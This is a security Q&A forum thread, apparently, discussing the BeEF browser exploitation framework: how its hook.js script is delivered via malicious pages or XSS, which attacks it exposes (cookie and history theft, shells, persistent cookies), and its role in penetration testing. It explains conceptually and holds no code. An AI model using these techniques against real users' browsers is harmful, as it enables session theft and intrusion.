I have recently come across the BeEF- a browser exploitation tool. In most of the articles, it is said time and again that it is developed for research and pen test purposes! Has anyone worked with this tool?(If so can you give a working understanding or please point to some links where they have explained more real life examples)
What purpose does it have in real world? I am curious to know how it would enhance the security in an organization.
- 5,185
- 3
- 17
- 48
- 323
- 1
- 2
- 5
-
At about 37-38 mins into [this video](http://www.youtube.com/watch?v=jkZ2MOpI0BU), they go over it. It is basically like metasploit but for web sites/apps. – Garrett Fogerlie Apr 02 '13 at 10:08
4 Answers
Alright, BeEF is a framework similar to Metasploit. BeEf uses a javascript, hook.js
, which when executed by a browser, gives a hook to BeEF. With a hooked browser, similar to metasploit, you have an array of exploits in front of you. Some of them are viewing cookies, browser history to the more sophisticated attacks of getting a shell. I know for a fact that there is a shell exploit that uses a JBoss vulnerability.
So, how the attack works is as follows, the client visits a malicious page, which contains BeEF's hook.js script running on it, or it can be executed via a XSS attack. When this is executed, you can see that a browser is hooked to you on your BeEF control panel and thereafter, launch exploits.
More Details: The BeEF launches a BeEF instance which is a combination of the UI server(the UI which is used to launch attacks and shows the various exploits) and the communications server which coordinates and communicates with the hooked browsers. These 2 servers in collaboration makes BeEF work.
BeEF has a very clean interface, by organizing attacks based on type and also indicating if particular attack is relevant to a browser (IE, FF, Chrome etc.). So you can just point and click on the attacks to launch.
What purpose does it have in real world? I am curious to know how it would enhance the security in an organization.
It can be used as a serious Pen Test tool. In most cases, when you demonstrate an XSS to a client (assuming you're a pen tester) it does not have that much of an impact when you show them a silly pop up. On the other hand, if you demonstrate XSS using BeEF, now that will give them a scare.
Further reading: http://code.google.com/p/beef/wiki/WindowsInstall
- 61,367
- 12
- 115
- 320
- 4,260
- 5
- 23
- 34
Beef is an exploitation tool (offensive) of course. Given so, when you power up beef and you hook a page, you get to see little colour codes, which invariantly tell you the extent of vulnerability of the page(which works and is invisible, right to which is visible). It is however NOT a vulnerability assessment tool. It complements one.
In the real world. It is probably step 4 or 5 in a pen testing exercise, whereby once you ascertain the probable vulnerabilities(Nessus, OpenVAS), you start the offensive on the weaknesses. This is where Beef comes into the picture.
- 11
- 2
While I do not have direct experience with this tool, I can say that an exploitation toolkit will not directly enhance the security of an organization. That is, this is an offensive tool not a defensive tool. How offensive tools can be, and often are, used are as a means to help guide your defensive posture.
Offensive tools, like BeEF or Metasploit and to a lesser extent Nessus, are used to find vulnerabilities in your organizations defenses. Once you know about the holes you can start building out defensive measures to counteract them. The measures may be implementing a patch management system, hardening your systems and applications, tightening down (installing?) firewalls, creating a user training program, or any other project that is intended to reduce your risk profile.
- 15,167
- 5
- 61
- 91
-
1Are you sure that BeEF helps to find vulnerabilities? I thought that it's an exploit kit: once you find a vulnerability, then you can fire up BeEF, and BeEF will help automate the process of doing damage (e.g., exfiltrating cookies, spoofing pages, etc.). Have I misunderstood? – D.W. Nov 11 '12 at 23:48
-
@D.W.: I suppose I was drawing a pretty fine line between finding vulnerabilities and exploiting them. Like I said, I've never used BeEF, I was only extrapolating based on what little I read. – Scott Pack Nov 12 '12 at 00:45
I have to agree with Scott. BeEF has very limited use as a pentest tool. It is a great attack tool however, as practically any browser that loads the hook script will get hooked. To prevent this, you will have to disable Javascript from running in your browser.
If you happen to be running the BeEF server, hooked browsers will show up in the dashboard whenever a victim visits the site hosting your javascript hook. You can configure BeEF to create persistent cookies on the victim machine that will survive a simple cookie-cache clearing. So long as the target machine has a browser window open running the BeEF hook code, the attacker will have access to the victims browser. It is during this window an attacker would have to initiate additional exploits from within the BeEF framework to maintain a persistent connection after the browser window is closed.
BeEF is not good as a pentesting tool as currently mitigation of the attack vector requires expecting all web browsers within an organization to run without javascript enabled. As the majority of websites (including this one) use javascript for functionality that is not likely to happen.
- 9
- 1
-
6I think you are confusing penetration testing with vulnerability assessment. BeEF is not for vulnerability assessment, for the very reasons you list. However, it is great for pentesting because it lets the organization see the full impact of vulnerabilities in their web applications, as well as training their network operators to recognize a XSS exploit in progress. – bonsaiviking Nov 10 '12 at 03:49